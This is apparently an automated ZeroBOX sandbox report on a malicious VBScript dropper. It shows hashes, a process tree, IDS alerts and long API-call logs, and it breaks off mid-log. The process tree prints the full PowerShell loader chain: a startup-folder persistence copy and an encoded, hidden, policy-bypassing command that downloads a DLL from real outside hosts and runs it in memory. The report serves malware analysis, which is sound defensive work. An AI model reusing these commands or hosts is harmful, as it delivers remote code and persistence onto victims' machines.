Summary | ZeroBOX

HP_099333DDW.vbs

Generic Malware Antivirus PWS KeyLogger SMTP Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 21, 2023, 6:10 p.m. Sept. 21, 2023, 6:18 p.m.
Size 206.5KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 878b00995ad5c6ab937cbab9e9b40c06
SHA256 3fe7fcdfcb71ba792724d2734e0ae41db3c27880bf0c7ddb664b11baa8a9cc03
CRC32 4E55D282
ssdeep 6144:R9od/r+GF18Z8S8Q8s8P838f8M8x8K8G8W808o8XUnX3JTVrAq:0r+GFmX3JTVrAq
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs

    840
    • cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"

      2072
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD

      2424
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"

        2516

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49170 -> 172.217.31.10:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 198.46.178.152:80 -> 192.168.56.103:49171 2020425 ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 Exploit Kit Activity Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49170
172.217.31.10:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322f10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00323890
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b790
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0055b050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x8f0a1c
0x8f09a6
0x8f07ed
0x8f0070
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x740cf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f3d05
registers.esp: 1437300
registers.edi: 1437324
registers.eax: 0
registers.ebp: 1437336
registers.edx: 195
registers.ebx: 41535288
registers.esi: 41539248
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.46.178.152/88/Runtime.txt
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a
request GET http://198.46.178.152/88/Runtime.txt
request GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 393216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2300
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2300
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02463000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02464000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02465000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02466000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ca000
